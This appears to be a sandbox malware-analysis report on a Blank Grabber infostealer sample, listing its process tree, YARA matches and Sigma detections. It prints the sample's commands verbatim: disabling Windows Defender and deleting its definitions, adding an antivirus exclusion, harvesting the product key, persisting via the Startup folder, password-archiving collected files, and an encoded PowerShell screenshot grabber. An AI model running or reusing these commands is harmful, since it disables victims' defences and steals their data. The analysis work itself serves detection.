      • cmd.exe (PID: 7408 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7432 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7328 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7276 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7296 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7376 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7636 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7208 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 2792 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7640 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\_MEI17882\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
    SourceRuleDescriptionAuthorStrings
    00000002.00000002.2329026765.0000028C87B86000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
      00000002.00000003.2322690660.0000028C87B63000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        00000000.00000003.2041945157.000001CCD86C8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
          00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
              Click to see the 9 entries

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe", ParentImage: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe, ParentProcessId: 5260, ParentProcessName: #U202f#U202f#U2005#U00a0.scr.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'", ProcessId: 4432, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe", ParentImage: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe, ParentProcessId: 5260, ParentProcessName: #U202f#U202f#U2005#U00a0.scr.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 744, ProcessName: cmd.exe
              Source: Process startedAuthor: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe", ParentImage: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe, ParentProcessId: 5260, ParentProcessName: #U202f#U202f#U2005#U00a0.scr.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *", ProcessId: 7620, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe, ProcessId: 5260, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAI